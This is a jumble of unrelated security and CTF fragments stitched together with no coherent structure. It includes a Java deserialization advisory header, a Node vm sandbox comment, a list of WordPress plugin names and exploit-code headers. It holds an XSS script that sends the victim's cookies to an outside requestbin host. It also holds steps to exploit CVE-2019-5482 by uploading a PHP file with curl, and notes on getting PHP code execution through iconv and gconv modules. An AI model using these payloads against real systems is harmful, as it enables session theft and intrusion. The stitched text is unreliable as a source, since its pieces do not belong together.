$ rails runner 'Rails.application.config.action_dispatch.tap { |c| p encrypted_cookie_salt: c.encrypted_cookie_salt, encrypted_signed_cookie_salt: c.encrypted_signed_cookie_salt }'
Chris Frohoff – Qualcomm Information Security and Risk Management
- Affected Product(s): Java SE 6, Java SE 7
- Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
- Vendor Contact: secalert_us@oracle.com
- Vulnerability Type: Unsafe Object Deserialization
////////
// The vm module lets you run a string containing javascript code 'in
// a sandbox', where you specify a context of global variables that
// exist for the duration of its execution. This works more or less
// well, and if you're in control of the code that's running, and you
// have a reasonable protocol in mind for how it expects a certain
// context to exist and interacts with it --- like, maybe a plug-in
// API for a program, with some endpoints defined for it that do
// useful domain-specific things --- your life can go smoothly.
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
- Confirm that you have an unpatched version of libcurl, which contains CVE-2019-5482
- Update the IP addresses in the source files
- Launch srv.py on the server
- Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Credits: @hugeh0ge
It uses iconv, in PHP, in order to execute the same payload.
Use cases:
- You control the first parameter of iconv (in_charset), you can set an env var, and you can upload arbitrary files (the .so library file and the gconv-modules file) and you know their path.
- You have a PHP RCE but system, shell_exec, curl_exec and other functions are disabled, but you can setenv (and LD_PRELOAD is blacklisted).
10web-manager
4k-icon-fonts-for-visual-composer
accelerated-mobile-pages
accept-payments-wp
accu-auto-backup
ace-edit
ace-editor-for-wp
aceide
acelerator
acf-code-field
#!/usr/bin/env ruby
# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/
$flag = File.read('flag').chomp
$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil
/*
gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf
objcopy -Obinary -j .text solve.elf solve.bin
Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c,
https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c
and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c
*/
#include <stdio.h>
#include <stdlib.h>